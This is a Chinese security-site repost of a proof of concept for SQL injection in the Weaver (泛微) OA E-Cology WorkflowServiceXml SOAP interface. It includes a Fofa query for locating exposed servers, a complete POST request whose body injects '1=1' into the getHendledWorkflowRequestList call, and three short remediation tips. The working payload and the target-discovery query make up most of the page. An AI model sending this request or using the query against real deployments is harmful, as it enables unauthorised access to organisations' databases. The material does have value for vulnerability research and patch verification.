泛微OA E-Cology WorkflowServiceXml Sql注入 PoC

admin 2024年10月2日12:26:57评论1 views字数 966阅读3分13秒阅读模式
 

漏洞描述

泛微OA E-Cology WorkflowServiceXml 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。

网络空间测绘

Fofa

app="泛微-OA(e-cology)"
泛微OA E-Cology WorkflowServiceXml Sql注入 PoC

漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1
Host:127.0.0.1
Content-Type: text/xml
Accept-Encoding: gzip, deflate, br
User-Agent:Mozilla/5.0(compatible; MSIE 9.0;Windows NT 6.1; WOW64;Trident/5.0; SLCC2;.NET CLR 2.0.50727;.NET CLR 3.5.30729;.NET CLR 3.0.30729;MediaCenter PC 6.0;.NET4.0C;.NET4.0E; LBBROWSER)
Content-Length:686
Connection: keep-alive

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
泛微OA E-Cology WorkflowServiceXml Sql注入 PoC
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。

2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。

3、及时升级产品到最新版本。

原文始发于微信公众号(凝聚力安全团队):【漏洞复现】泛微OA E-Cology WorkflowServiceXml Sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月2日12:26:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微OA E-Cology WorkflowServiceXml Sql注入 PoChttps://cn-sec.com/archives/3227737.html

发表评论

匿名网友 填写信息